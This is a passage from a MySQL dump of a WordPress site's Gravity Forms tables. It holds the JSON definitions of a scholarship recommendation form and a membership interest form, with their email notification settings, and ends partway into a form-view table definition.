"formId\":8,\"description\":\"\",\"allowsPrepopulate\":false,\"inputMask\":false,\"inputMaskValue\":\"\",\"inputType\":\"\",\"labelPlacement\":\"\",\"descriptionPlacement\":\"\",\"subLabelPlacement\":\"\",\"placeholder\":\"\",\"cssClass\":\"\",\"inputName\":\"\",\"visibility\":\"visible\",\"noDuplicates\":false,\"defaultValue\":\"\",\"choices\":\"\",\"conditionalLogic\":\"\",\"failed_validation\":\"\",\"productField\":\"\",\"enablePasswordInput\":\"\",\"maxLength\":\"\",\"multipleFiles\":false,\"maxFiles\":\"\",\"calculationFormula\":\"\",\"calculationRounding\":\"\",\"enableCalculation\":\"\",\"disableQuantity\":false,\"displayAllCategories\":false,\"useRichTextEditor\":false,\"pageNumber\":1,\"displayOnly\":\"\"},{\"type\":\"text\",\"id\":12,\"label\":\"Position at School\\/Organization\",\"adminLabel\":\"\",\"isRequired\":true,\"size\":\"medium\",\"errorMessage\":\"\",\"inputs\":null,\"formId\":8,\"description\":\"\",\"allowsPrepopulate\":false,\"inputMask\":false,\"inputMaskValue\":\"\",\"inputType\":\"\",\"labelPlacement\":\"\",\"descriptionPlacement\":\"\",\"subLabelPlacement\":\"\",\"placeholder\":\"\",\"cssClass\":\"\",\"inputName\":\"\",\"visibility\":\"visible\",\"noDuplicates\":false,\"defaultValue\":\"\",\"choices\":\"\",\"conditionalLogic\":\"\",\"failed_validation\":\"\",\"productField\":\"\",\"enablePasswordInput\":\"\",\"maxLength\":\"\",\"multipleFiles\":false,\"maxFiles\":\"\",\"calculationFormula\":\"\",\"calculationRounding\":\"\",\"enableCalculation\":\"\",\"disableQuantity\":false,\"displayAllCategories\":false,\"useRichTextEditor\":false,\"pageNumber\":1,\"displayOnly\":\"\"},{\"type\":\"email\",\"id\":2,\"label\":\"Email\",\"adminLabel\":\"\",\"isRequired\":true,\"size\":\"medium\",\"errorMessage\":\"\",\"inputs\":null,\"formId\":8,\"description\":\"\",\"allowsPrepopulate\":false,\"inputMask\":false,\"inputMaskValue\":\"\",\"inputType\":\"\",\"labelPlacement\":\"\",\"descriptionPlacement\":\"\",\"subLabelPlacement\":\"\",\"placeholder\":\"\",\"cssClass\":\"\",\"inputName\":\"\",\"visibility\":\"visible\",\"noDuplicates\":false,\"defaultValue\":\"\",\"choices\":\"\",\"conditionalLogic\":\"\",\"failed_validation\":\"\",\"productField\":\"\",\"emailConfirmEnabled\":\"\",\"multipleFiles\":false,\"maxFiles\":\"\",\"calculationFormula\":\"\",\"calculationRounding\":\"\",\"enableCalculation\":\"\",\"disableQuantity\":false,\"displayAllCategories\":false,\"useRichTextEditor\":false,\"pageNumber\":1,\"displayOnly\":\"\"},{\"type\":\"section\",\"id\":17,\"label\":\"Applicant Information\",\"adminLabel\":\"\",\"isRequired\":false,\"size\":\"medium\",\"errorMessage\":\"\",\"inputs\":null,\"displayOnly\":true,\"formId\":8,\"description\":\"\",\"allowsPrepopulate\":false,\"inputMask\":false,\"inputMaskValue\":\"\",\"inputType\":\"\",\"labelPlacement\":\"\",\"descriptionPlacement\":\"\",\"subLabelPlacement\":\"\",\"placeholder\":\"\",\"cssClass\":\"\",\"inputName\":\"\",\"visibility\":\"visible\",\"noDuplicates\":false,\"defaultValue\":\"\",\"choices\":\"\",\"conditionalLogic\":\"\",\"failed_validation\":\"\",\"productField\":\"\",\"multipleFiles\":false,\"maxFiles\":\"\",\"calculationFormula\":\"\",\"calculationRounding\":\"\",\"enableCalculation\":\"\",\"disableQuantity\":false,\"displayAllCategories\":false,\"useRichTextEditor\":false,\"pageNumber\":1},{\"type\":\"text\",\"id\":3,\"label\":\"Applicant\'s Name\",\"adminLabel\":\"\",\"isRequired\":true,\"size\":\"medium\",\"errorMessage\":\"\",\"inputs\":null,\"formId\":8,\"description\":\"\",\"allowsPrepopulate\":false,\"inputMask\":false,\"inputMaskValue\":\"\",\"inputType\":\"\",\"labelPlacement\":\"\",\"descriptionPlacement\":\"\",\"subLabelPlacement\":\"\",\"placeholder\":\"\",\"cssClass\":\"\",\"inputName\":\"\",\"visibility\":\"visible\",\"noDuplicates\":false,\"defaultValue\":\"\",\"choices\":\"\",\"conditionalLogic\":\"\",\"failed_validation\":\"\",\"productField\":\"\",\"enablePasswordInput\":\"\",\"maxLength\":\"\",\"multipleFiles\":false,\"maxFiles\":\"\",\"calculationFormula\":\"\",\"calculationRounding\":\"\",\"enableCalculation\":\"\",\"disableQuantity\":false,\"displayAllCategories\":false,\"useRichTextEditor\":false,\"pageNumber\":1,\"displayOnly\":\"\"},{\"type\":\"text\",\"id\":4,\"label\":\"How long have you known the applicant?\",\"adminLabel\":\"\",\"isRequired\":true,\"size\":\"medium\",\"errorMessage\":\"\",\"inputs\":null,\"formId\":8,\"description\":\"\",\"allowsPrepopulate\":false,\"inputMask\":false,\"inputMaskValue\":\"\",\"inputType\":\"\",\"labelPlacement\":\"\",\"descriptionPlacement\":\"\",\"subLabelPlacement\":\"\",\"placeholder\":\"\",\"cssClass\":\"\",\"inputName\":\"\",\"visibility\":\"visible\",\"noDuplicates\":false,\"defaultValue\":\"\",\"choices\":\"\",\"conditionalLogic\":\"\",\"failed_validation\":\"\",\"productField\":\"\",\"enablePasswordInput\":\"\",\"maxLength\":\"\",\"multipleFiles\":false,\"maxFiles\":\"\",\"calculationFormula\":\"\",\"calculationRounding\":\"\",\"enableCalculation\":\"\",\"disableQuantity\":false,\"displayAllCategories\":false,\"useRichTextEditor\":false,\"pageNumber\":1,\"displayOnly\":\"\"},{\"type\":\"select\",\"id\":5,\"label\":\"What is your relationship with the applicant?\",\"adminLabel\":\"\",\"isRequired\":true,\"size\":\"medium\",\"errorMessage\":\"\",\"inputs\":null,\"choices\":[{\"text\":\"Teacher\\/Professor\",\"value\":\"Teacher\\/Professor\",\"isSelected\":false,\"price\":\"\"},{\"text\":\"Advisor\\/Counselor\",\"value\":\"Advisor\\/Counselor\",\"isSelected\":false,\"price\":\"\"},{\"text\":\"Administrator\",\"value\":\"Administrator\",\"isSelected\":false,\"price\":\"\"},{\"text\":\"Other\",\"value\":\"Other\",\"isSelected\":false,\"price\":\"\"}],\"formId\":8,\"description\":\"\",\"allowsPrepopulate\":false,\"inputMask\":false,\"inputMaskValue\":\"\",\"inputType\":\"\",\"labelPlacement\":\"\",\"descriptionPlacement\":\"\",\"subLabelPlacement\":\"\",\"placeholder\":\"\",\"cssClass\":\"\",\"inputName\":\"\",\"visibility\":\"visible\",\"noDuplicates\":false,\"defaultValue\":\"\",\"conditionalLogic\":\"\",\"failed_validation\":\"\",\"productField\":\"\",\"enablePrice\":\"\",\"multipleFiles\":false,\"maxFiles\":\"\",\"calculationFormula\":\"\",\"calculationRounding\":\"\",\"enableCalculation\":\"\",\"disableQuantity\":false,\"displayAllCategories\":false,\"useRichTextEditor\":false,\"pageNumber\":1,\"displayOnly\":\"\"},{\"type\":\"text\",\"id\":6,\"label\":\"If other, explain\",\"adminLabel\":\"\",\"isRequired\":false,\"size\":\"medium\",\"errorMessage\":\"\",\"inputs\":null,\"formId\":8,\"description\":\"\",\"allowsPrepopulate\":false,\"inputMask\":false,\"inputMaskValue\":\"\",\"inputType\":\"\",\"labelPlacement\":\"\",\"descriptionPlacement\":\"\",\"subLabelPlacement\":\"\",\"placeholder\":\"\",\"cssClass\":\"\",\"inputName\":\"\",\"visibility\":\"visible\",\"noDuplicates\":false,\"defaultValue\":\"\",\"choices\":\"\",\"conditionalLogic\":\"\",\"failed_validation\":\"\",\"productField\":\"\",\"enablePasswordInput\":\"\",\"maxLength\":\"\",\"multipleFiles\":false,\"maxFiles\":\"\",\"calculationFormula\":\"\",\"calculationRounding\":\"\",\"enableCalculation\":\"\",\"disableQuantity\":false,\"displayAllCategories\":false,\"useRichTextEditor\":false,\"pageNumber\":1,\"displayOnly\":\"\"},{\"type\":\"section\",\"id\":10,\"label\":\"Applicant Performance\",\"adminLabel\":\"\",\"isRequired\":false,\"size\":\"medium\",\"errorMessage\":\"\",\"inputs\":null,\"displayOnly\":true,\"formId\":8,\"description\":\"Please rate the applicant based on your experience with the student. If a category does not apply to your experience with the student, please select \\\"Not Applicable.\\\"\",\"allowsPrepopulate\":false,\"inputMask\":false,\"inputMaskValue\":\"\",\"inputType\":\"\",\"labelPlacement\":\"\",\"descriptionPlacement\":\"\",\"subLabelPlacement\":\"\",\"placeholder\":\"\",\"cssClass\":\"\",\"inputName\":\"\",\"visibility\":\"visible\",\"noDuplicates\":false,\"defaultValue\":\"\",\"choices\":\"\",\"conditionalLogic\":\"\",\"failed_validation\":\"\",\"productField\":\"\",\"multipleFiles\":false,\"maxFiles\":\"\",\"calculationFormula\":\"\",\"calculationRounding\":\"\",\"enableCalculation\":\"\",\"disableQuantity\":false,\"displayAllCategories\":false,\"useRichTextEditor\":false,\"pageNumber\":1},{\"type\":\"select\",\"id\":7,\"label\":\"Academic Performance & Motivation\",\"adminLabel\":\"\",\"isRequired\":true,\"size\":\"medium\",\"errorMessage\":\"\",\"inputs\":null,\"choices\":[{\"text\":\"Excellent\",\"value\":\"Excellent\",\"isSelected\":false,\"price\":\"\"},{\"text\":\"Average\",\"value\":\"Average\",\"isSelected\":false,\"price\":\"\"},{\"text\":\"Below Average\",\"value\":\"Below Average\",\"isSelected\":false,\"price\":\"\"},{\"text\":\"N\\/A\",\"value\":\"N\\/A\",\"isSelected\":false,\"price\":\"\"}],\"formId\":8,\"description\":\"\",\"allowsPrepopulate\":false,\"inputMask\":false,\"inputMaskValue\":\"\",\"inputType\":\"\",\"labelPlacement\":\"\",\"descriptionPlacement\":\"\",\"subLabelPlacement\":\"\",\"placeholder\":\"\",\"cssClass\":\"\",\"inputName\":\"\",\"visibility\":\"visible\",\"noDuplicates\":false,\"defaultValue\":\"\",\"conditionalLogic\":\"\",\"failed_validation\":\"\",\"productField\":\"\",\"enablePrice\":\"\",\"multipleFiles\":false,\"maxFiles\":\"\",\"calculationFormula\":\"\",\"calculationRounding\":\"\",\"enableCalculation\":\"\",\"disableQuantity\":false,\"displayAllCategories\":false,\"useRichTextEditor\":false,\"pageNumber\":1,\"displayOnly\":\"\"},{\"type\":\"select\",\"id\":9,\"label\":\"Demonstrated Leadership\",\"adminLabel\":\"\",\"isRequired\":true,\"size\":\"medium\",\"errorMessage\":\"\",\"inputs\":null,\"choices\":[{\"text\":\"Excellent\",\"value\":\"Excellent\",\"isSelected\":false,\"price\":\"\"},{\"text\":\"Average\",\"value\":\"Average\",\"isSelected\":false,\"price\":\"\"},{\"text\":\"Below Average\",\"value\":\"Below Average\",\"isSelected\":false,\"price\":\"\"},{\"text\":\"N\\/A\",\"value\":\"N\\/A\",\"isSelected\":false,\"price\":\"\"}],\"formId\":8,\"description\":\"\",\"allowsPrepopulate\":false,\"inputMask\":false,\"inputMaskValue\":\"\",\"inputType\":\"\",\"labelPlacement\":\"\",\"descriptionPlacement\":\"\",\"subLabelPlacement\":\"\",\"placeholder\":\"\",\"cssClass\":\"\",\"inputName\":\"\",\"visibility\":\"visible\",\"noDuplicates\":false,\"defaultValue\":\"\",\"conditionalLogic\":\"\",\"failed_validation\":\"\",\"productField\":\"\",\"enablePrice\":\"\",\"multipleFiles\":false,\"maxFiles\":\"\",\"calculationFormula\":\"\",\"calculationRounding\":\"\",\"enableCalculation\":\"\",\"disableQuantity\":false,\"displayAllCategories\":false,\"useRichTextEditor\":false,\"pageNumber\":1,\"displayOnly\":\"\"},{\"type\":\"select\",\"id\":8,\"label\":\"Community Awareness & Involvement\",\"adminLabel\":\"\",\"isRequired\":true,\"size\":\"medium\",\"errorMessage\":\"\",\"inputs\":null,\"choices\":[{\"text\":\"Excellent\",\"value\":\"Excellent\",\"isSelected\":false,\"price\":\"\"},{\"text\":\"Average\",\"value\":\"Average\",\"isSelected\":false,\"price\":\"\"},{\"text\":\"Below Average\",\"value\":\"Below Average\",\"isSelected\":false,\"price\":\"\"},{\"text\":\"N\\/A\",\"value\":\"N\\/A\",\"isSelected\":false,\"price\":\"\"}],\"formId\":8,\"description\":\"\",\"allowsPrepopulate\":false,\"inputMask\":false,\"inputMaskValue\":\"\",\"inputType\":\"\",\"labelPlacement\":\"\",\"descriptionPlacement\":\"\",\"subLabelPlacement\":\"\",\"placeholder\":\"\",\"cssClass\":\"\",\"inputName\":\"\",\"visibility\":\"visible\",\"noDuplicates\":false,\"defaultValue\":\"\",\"conditionalLogic\":\"\",\"failed_validation\":\"\",\"productField\":\"\",\"enablePrice\":\"\",\"multipleFiles\":false,\"maxFiles\":\"\",\"calculationFormula\":\"\",\"calculationRounding\":\"\",\"enableCalculation\":\"\",\"disableQuantity\":false,\"displayAllCategories\":false,\"useRichTextEditor\":false,\"pageNumber\":1,\"displayOnly\":\"\"},{\"type\":\"section\",\"id\":13,\"label\":\"Recommendation\",\"adminLabel\":\"\",\"isRequired\":false,\"size\":\"medium\",\"errorMessage\":\"\",\"inputs\":null,\"displayOnly\":true,\"formId\":8,\"description\":\"Please explain what you know about the applicant and why they are deserving of a W. Ruth Conway Scholarship. Utilize the box below or attach a letter of recommendation. \",\"allowsPrepopulate\":false,\"inputMask\":false,\"inputMaskValue\":\"\",\"inputType\":\"\",\"labelPlacement\":\"\",\"descriptionPlacement\":\"\",\"subLabelPlacement\":\"\",\"placeholder\":\"\",\"cssClass\":\"\",\"inputName\":\"\",\"visibility\":\"visible\",\"noDuplicates\":false,\"defaultValue\":\"\",\"choices\":\"\",\"conditionalLogic\":\"\",\"failed_validation\":\"\",\"productField\":\"\",\"multipleFiles\":false,\"maxFiles\":\"\",\"calculationFormula\":\"\",\"calculationRounding\":\"\",\"enableCalculation\":\"\",\"disableQuantity\":false,\"displayAllCategories\":false,\"useRichTextEditor\":false,\"pageNumber\":1},{\"type\":\"textarea\",\"id\":14,\"label\":\"Recommendation Text\",\"adminLabel\":\"\",\"isRequired\":false,\"size\":\"medium\",\"errorMessage\":\"\",\"inputs\":null,\"formId\":8,\"description\":\"\",\"allowsPrepopulate\":false,\"inputMask\":false,\"inputMaskValue\":\"\",\"inputType\":\"\",\"labelPlacement\":\"\",\"descriptionPlacement\":\"\",\"subLabelPlacement\":\"\",\"placeholder\":\"\",\"cssClass\":\"\",\"inputName\":\"\",\"visibility\":\"visible\",\"noDuplicates\":false,\"defaultValue\":\"\",\"choices\":\"\",\"conditionalLogic\":\"\",\"failed_validation\":\"\",\"productField\":\"\",\"form_id\":\"\",\"useRichTextEditor\":false,\"multipleFiles\":false,\"maxFiles\":\"\",\"calculationFormula\":\"\",\"calculationRounding\":\"\",\"enableCalculation\":\"\",\"disableQuantity\":false,\"displayAllCategories\":false,\"pageNumber\":1,\"displayOnly\":\"\"},{\"type\":\"fileupload\",\"id\":15,\"label\":\"Recommendation Letter\",\"adminLabel\":\"\",\"isRequired\":false,\"size\":\"medium\",\"errorMessage\":\"\",\"inputs\":null,\"formId\":8,\"description\":\"\",\"allowsPrepopulate\":false,\"inputMask\":false,\"inputMaskValue\":\"\",\"inputType\":\"\",\"labelPlacement\":\"\",\"descriptionPlacement\":\"\",\"subLabelPlacement\":\"\",\"placeholder\":\"\",\"cssClass\":\"\",\"inputName\":\"\",\"visibility\":\"visible\",\"noDuplicates\":false,\"defaultValue\":\"\",\"choices\":\"\",\"conditionalLogic\":\"\",\"maxFileSize\":\"\",\"maxFiles\":\"\",\"multipleFiles\":false,\"allowedExtensions\":\"\",\"failed_validation\":\"\",\"productField\":\"\",\"calculationFormula\":\"\",\"calculationRounding\":\"\",\"enableCalculation\":\"\",\"disableQuantity\":false,\"displayAllCategories\":false,\"useRichTextEditor\":false,\"pageNumber\":1,\"displayOnly\":\"\"},{\"type\":\"select\",\"id\":16,\"label\":\"Overall Recommendation\",\"adminLabel\":\"\",\"isRequired\":true,\"size\":\"medium\",\"errorMessage\":\"\",\"inputs\":null,\"choices\":[{\"text\":\"Highly recommended\",\"value\":\"Highly recommended\",\"isSelected\":false,\"price\":\"\"},{\"text\":\"Recommended\",\"value\":\"Recommended\",\"isSelected\":false,\"price\":\"\"},{\"text\":\"Do not recommend\",\"value\":\"Do not recommend\",\"isSelected\":false,\"price\":\"\"}],\"formId\":8,\"description\":\"Please select the option that best reflects your recommendation of this applicant. \",\"allowsPrepopulate\":false,\"inputMask\":false,\"inputMaskValue\":\"\",\"inputType\":\"\",\"labelPlacement\":\"\",\"descriptionPlacement\":\"\",\"subLabelPlacement\":\"\",\"placeholder\":\"\",\"cssClass\":\"\",\"inputName\":\"\",\"visibility\":\"visible\",\"noDuplicates\":false,\"defaultValue\":\"\",\"conditionalLogic\":\"\",\"failed_validation\":\"\",\"productField\":\"\",\"enablePrice\":\"\",\"multipleFiles\":false,\"maxFiles\":\"\",\"calculationFormula\":\"\",\"calculationRounding\":\"\",\"enableCalculation\":\"\",\"disableQuantity\":false,\"displayAllCategories\":false,\"useRichTextEditor\":false,\"pageNumber\":1,\"displayOnly\":\"\"}],\"version\":\"2.1.2\",\"id\":8,\"useCurrentUserAsAuthor\":true,\"postContentTemplateEnabled\":false,\"postTitleTemplateEnabled\":false,\"postTitleTemplate\":\"\",\"postContentTemplate\":\"\",\"lastPageButton\":null,\"pagination\":null,\"firstPageCssClass\":null,\"notifications\":{\"59bc9e0554cdf\":{\"isActive\":true,\"id\":\"59bc9e0554cdf\",\"name\":\"Admin Notification\",\"service\":\"wordpress\",\"event\":\"form_submission\",\"to\":\"scholarships@zphiblgz.org\",\"toType\":\"email\",\"bcc\":\"\",\"subject\":\"Recommendation for {Applicant\\\\\'s Name:3}\",\"message\":\"{all_fields}\",\"from\":\"{admin_email}\",\"fromName\":\"\",\"replyTo\":\"\",\"routing\":null,\"conditionalLogic\":null,\"disableAutoformat\":false}},\"confirmations\":{\"59bc9e055bdee\":{\"id\":\"59bc9e055bdee\",\"name\":\"Default Confirmation\",\"isDefault\":true,\"type\":\"message\",\"message\":\"Thanks for contacting us! We will get in touch with you shortly.\",\"url\":\"\",\"pageId\":\"\",\"queryString\":\"\"}},\"subLabelPlacement\":\"below\",\"cssClass\":\"\",\"enableHoneypot\":true,\"enableAnimation\":false,\"save\":{\"enabled\":false,\"button\":{\"type\":\"link\",\"text\":\"Save and Continue Later\"}},\"limitEntries\":false,\"limitEntriesCount\":\"\",\"limitEntriesPeriod\":\"\",\"limitEntriesMessage\":\"\",\"scheduleForm\":false,\"scheduleStart\":\"\",\"scheduleStartHour\":\"\",\"scheduleStartMinute\":\"\",\"scheduleStartAmpm\":\"\",\"scheduleEnd\":\"\",\"scheduleEndHour\":\"\",\"scheduleEndMinute\":\"\",\"scheduleEndAmpm\":\"\",\"schedulePendingMessage\":\"\",\"scheduleMessage\":\"\",\"requireLogin\":false,\"requireLoginMessage\":\"\"}','','{\"59bc9e055bdee\":{\"id\":\"59bc9e055bdee\",\"name\":\"Default Confirmation\",\"isDefault\":true,\"type\":\"message\",\"message\":\"Thank you for completing a recommendation for a W. Ruth Conway Scholarship applicant! Save or print this confirmation for your records.\",\"url\":\"\",\"pageId\":0,\"queryString\":\"\",\"disableAutoformat\":false,\"conditionalLogic\":[]}}','{\"59bc9e0554cdf\":{\"isActive\":true,\"id\":\"59bc9e0554cdf\",\"name\":\"Admin Notification\",\"service\":\"wordpress\",\"event\":\"form_submission\",\"to\":\"scholarships@zphiblgz.org\",\"toType\":\"email\",\"bcc\":\"\",\"subject\":\"Recommendation for {Applicant\\\\\'s Name:3}\",\"message\":\"{all_fields}\",\"from\":\"{admin_email}\",\"fromName\":\"\",\"replyTo\":\"\",\"routing\":null,\"conditionalLogic\":null,\"disableAutoformat\":false}}'),(9,'{\"title\":\"Denim & Pearls\",\"description\":\"\",\"labelPlacement\":\"top_label\",\"descriptionPlacement\":\"below\",\"button\":{\"type\":\"text\",\"text\":\"Submit\",\"imageUrl\":\"\"},\"fields\":[],\"version\":\"2.1.2\",\"id\":9}',NULL,'{\"59f3be776e1a8\":{\"id\":\"59f3be776e1a8\",\"name\":\"Default Confirmation\",\"isDefault\":true,\"type\":\"message\",\"message\":\"Thanks for contacting us! We will get in touch with you shortly.\",\"url\":\"\",\"pageId\":\"\",\"queryString\":\"\"}}','{\"59f3be7765a5e\":{\"id\":\"59f3be7765a5e\",\"to\":\"{admin_email}\",\"name\":\"Admin Notification\",\"event\":\"form_submission\",\"toType\":\"email\",\"subject\":\"New submission from {form_title}\",\"message\":\"{all_fields}\"}}'),(10,'{\"title\":\"Membership Interest Form\",\"description\":\"\",\"labelPlacement\":\"top_label\",\"descriptionPlacement\":\"below\",\"button\":{\"type\":\"text\",\"text\":\"Submit\",\"imageUrl\":\"\"},\"fields\":[{\"type\":\"name\",\"id\":1,\"label\":\"Name\",\"adminLabel\":\"\",\"isRequired\":true,\"size\":\"medium\",\"errorMessage\":\"\",\"nameFormat\":\"advanced\",\"inputs\":[{\"id\":\"1.2\",\"label\":\"Prefix\",\"name\":\"\",\"choices\":[{\"text\":\"Mr.\",\"value\":\"Mr.\",\"isSelected\":false,\"price\":\"\"},{\"text\":\"Mrs.\",\"value\":\"Mrs.\",\"isSelected\":false,\"price\":\"\"},{\"text\":\"Miss\",\"value\":\"Miss\",\"isSelected\":false,\"price\":\"\"},{\"text\":\"Ms.\",\"value\":\"Ms.\",\"isSelected\":false,\"price\":\"\"},{\"text\":\"Dr.\",\"value\":\"Dr.\",\"isSelected\":false,\"price\":\"\"},{\"text\":\"Prof.\",\"value\":\"Prof.\",\"isSelected\":false,\"price\":\"\"},{\"text\":\"Rev.\",\"value\":\"Rev.\",\"isSelected\":false,\"price\":\"\"}],\"isHidden\":true,\"inputType\":\"radio\"},{\"id\":\"1.3\",\"label\":\"First\",\"name\":\"\"},{\"id\":\"1.4\",\"label\":\"Middle\",\"name\":\"\",\"isHidden\":true},{\"id\":\"1.6\",\"label\":\"Last\",\"name\":\"\"},{\"id\":\"1.8\",\"label\":\"Suffix\",\"name\":\"\",\"isHidden\":true}],\"formId\":10,\"description\":\"\",\"allowsPrepopulate\":false,\"inputMask\":false,\"inputMaskValue\":\"\",\"inputType\":\"\",\"labelPlacement\":\"\",\"descriptionPlacement\":\"\",\"subLabelPlacement\":\"\",\"placeholder\":\"\",\"cssClass\":\"\",\"inputName\":\"\",\"visibility\":\"visible\",\"noDuplicates\":false,\"defaultValue\":\"\",\"choices\":\"\",\"conditionalLogic\":\"\",\"failed_validation\":\"\",\"productField\":\"\",\"pageNumber\":1,\"displayOnly\":\"\",\"multipleFiles\":false,\"maxFiles\":\"\",\"calculationFormula\":\"\",\"calculationRounding\":\"\",\"enableCalculation\":\"\",\"disableQuantity\":false,\"displayAllCategories\":false,\"useRichTextEditor\":false},{\"type\":\"email\",\"id\":3,\"label\":\"Email\",\"adminLabel\":\"\",\"isRequired\":true,\"size\":\"medium\",\"errorMessage\":\"\",\"inputs\":null,\"formId\":10,\"description\":\"\",\"allowsPrepopulate\":false,\"inputMask\":false,\"inputMaskValue\":\"\",\"inputType\":\"\",\"labelPlacement\":\"\",\"descriptionPlacement\":\"\",\"subLabelPlacement\":\"\",\"placeholder\":\"\",\"cssClass\":\"\",\"inputName\":\"\",\"visibility\":\"visible\",\"noDuplicates\":false,\"defaultValue\":\"\",\"choices\":\"\",\"conditionalLogic\":\"\",\"failed_validation\":\"\",\"productField\":\"\",\"emailConfirmEnabled\":\"\",\"pageNumber\":1,\"displayOnly\":\"\",\"multipleFiles\":false,\"maxFiles\":\"\",\"calculationFormula\":\"\",\"calculationRounding\":\"\",\"enableCalculation\":\"\",\"disableQuantity\":false,\"displayAllCategories\":false,\"useRichTextEditor\":false},{\"type\":\"phone\",\"id\":5,\"label\":\"Phone\",\"adminLabel\":\"\",\"isRequired\":true,\"size\":\"medium\",\"errorMessage\":\"\",\"inputs\":null,\"phoneFormat\":\"standard\",\"formId\":10,\"description\":\"\",\"allowsPrepopulate\":false,\"inputMask\":false,\"inputMaskValue\":\"\",\"inputType\":\"\",\"labelPlacement\":\"\",\"descriptionPlacement\":\"\",\"subLabelPlacement\":\"\",\"placeholder\":\"\",\"cssClass\":\"\",\"inputName\":\"\",\"visibility\":\"visible\",\"noDuplicates\":false,\"defaultValue\":\"\",\"choices\":\"\",\"conditionalLogic\":\"\",\"form_id\":\"\",\"failed_validation\":\"\",\"productField\":\"\",\"multipleFiles\":false,\"maxFiles\":\"\",\"calculationFormula\":\"\",\"calculationRounding\":\"\",\"enableCalculation\":\"\",\"disableQuantity\":false,\"displayAllCategories\":false,\"useRichTextEditor\":false,\"pageNumber\":1,\"displayOnly\":\"\"},{\"type\":\"select\",\"id\":2,\"label\":\"Membership Interest\",\"adminLabel\":\"\",\"isRequired\":true,\"size\":\"medium\",\"errorMessage\":\"\",\"inputs\":null,\"choices\":[{\"text\":\"Current Active Member (Transfer)\",\"value\":\"Current Active Member (Transfer)\",\"isSelected\":false,\"price\":\"\"},{\"text\":\"Inactive Member (Reclaim)\",\"value\":\"Inactive Member (Reclaim)\",\"isSelected\":false,\"price\":\"\"},{\"text\":\"Interested in Membership\",\"value\":\"Interested in Membership\",\"isSelected\":false,\"price\":\"\"}],\"formId\":10,\"description\":\"\",\"allowsPrepopulate\":false,\"inputMask\":false,\"inputMaskValue\":\"\",\"inputType\":\"\",\"labelPlacement\":\"\",\"descriptionPlacement\":\"\",\"subLabelPlacement\":\"\",\"placeholder\":\"\",\"cssClass\":\"\",\"inputName\":\"\",\"visibility\":\"visible\",\"noDuplicates\":false,\"defaultValue\":\"\",\"conditionalLogic\":\"\",\"failed_validation\":\"\",\"productField\":\"\",\"enablePrice\":\"\",\"multipleFiles\":false,\"maxFiles\":\"\",\"calculationFormula\":\"\",\"calculationRounding\":\"\",\"enableCalculation\":\"\",\"disableQuantity\":false,\"displayAllCategories\":false,\"useRichTextEditor\":false,\"pageNumber\":1,\"displayOnly\":\"\"},{\"type\":\"textarea\",\"id\":4,\"label\":\"Message\",\"adminLabel\":\"\",\"isRequired\":false,\"size\":\"medium\",\"errorMessage\":\"\",\"inputs\":null,\"formId\":10,\"description\":\"\",\"allowsPrepopulate\":false,\"inputMask\":false,\"inputMaskValue\":\"\",\"inputType\":\"\",\"labelPlacement\":\"\",\"descriptionPlacement\":\"\",\"subLabelPlacement\":\"\",\"placeholder\":\"\",\"cssClass\":\"\",\"inputName\":\"\",\"visibility\":\"visible\",\"noDuplicates\":false,\"defaultValue\":\"\",\"choices\":\"\",\"conditionalLogic\":\"\",\"failed_validation\":\"\",\"productField\":\"\",\"form_id\":\"\",\"useRichTextEditor\":false,\"multipleFiles\":false,\"maxFiles\":\"\",\"calculationFormula\":\"\",\"calculationRounding\":\"\",\"enableCalculation\":\"\",\"disableQuantity\":false,\"displayAllCategories\":false,\"pageNumber\":1,\"displayOnly\":\"\"}],\"version\":\"2.1.2\",\"id\":10,\"useCurrentUserAsAuthor\":true,\"postContentTemplateEnabled\":false,\"postTitleTemplateEnabled\":false,\"postTitleTemplate\":\"\",\"postContentTemplate\":\"\",\"lastPageButton\":null,\"pagination\":null,\"firstPageCssClass\":null,\"notifications\":{\"5b712882023e2\":{\"isActive\":true,\"id\":\"5b712882023e2\",\"name\":\"Admin Notification\",\"service\":\"wordpress\",\"event\":\"form_submission\",\"to\":\"membership@zphiblgz.org\",\"toType\":\"email\",\"bcc\":\"\",\"subject\":\"New Submission from {Membership Interest:2}\",\"message\":\"{all_fields}\",\"from\":\"{Email:3}\",\"fromName\":\"{Name (First):1.3}\",\"replyTo\":\"\",\"routing\":null,\"conditionalLogic\":null,\"disableAutoformat\":false}},\"confirmations\":{\"5b7128820386a\":{\"id\":\"5b7128820386a\",\"name\":\"Default Confirmation\",\"isDefault\":true,\"type\":\"message\",\"message\":\"Thanks for contacting us! We will get in touch with you shortly.\",\"url\":\"\",\"pageId\":\"\",\"queryString\":\"\"}},\"subLabelPlacement\":\"below\",\"cssClass\":\"\",\"enableHoneypot\":true,\"enableAnimation\":false,\"save\":{\"enabled\":false,\"button\":{\"type\":\"link\",\"text\":\"Save and Continue Later\"}},\"limitEntries\":false,\"limitEntriesCount\":\"\",\"limitEntriesPeriod\":\"\",\"limitEntriesMessage\":\"\",\"scheduleForm\":false,\"scheduleStart\":\"\",\"scheduleStartHour\":\"\",\"scheduleStartMinute\":\"\",\"scheduleStartAmpm\":\"\",\"scheduleEnd\":\"\",\"scheduleEndHour\":\"\",\"scheduleEndMinute\":\"\",\"scheduleEndAmpm\":\"\",\"schedulePendingMessage\":\"\",\"scheduleMessage\":\"\",\"requireLogin\":false,\"requireLoginMessage\":\"\"}',NULL,'{\"5b7128820386a\":{\"id\":\"5b7128820386a\",\"name\":\"Default Confirmation\",\"isDefault\":true,\"type\":\"message\",\"message\":\"Thanks for contacting us! We will get in touch with you shortly.\",\"url\":\"\",\"pageId\":\"\",\"queryString\":\"\"}}','{\"5b712882023e2\":{\"isActive\":true,\"id\":\"5b712882023e2\",\"name\":\"Admin Notification\",\"service\":\"wordpress\",\"event\":\"form_submission\",\"to\":\"membership@zphiblgz.org\",\"toType\":\"email\",\"bcc\":\"\",\"subject\":\"New Submission from {Membership Interest:2}\",\"message\":\"{all_fields}\",\"from\":\"{Email:3}\",\"fromName\":\"{Name (First):1.3}\",\"replyTo\":\"\",\"routing\":null,\"conditionalLogic\":null,\"disableAutoformat\":false}}');
/*!40000 ALTER TABLE `lwz_rg_form_meta` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `lwz_rg_form_view`
--

DROP TABLE IF EXISTS `lwz_rg_form_view`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `lwz_rg_form_view` (
  `id` bigint(20) unsigned NOT NULL AUTO_INCREMENT,
  `form_id` mediumint(8) unsigned NOT NULL,
  `date_created` datetime NOT NULL,
  `ip` char(15) DEFAULT NULL,
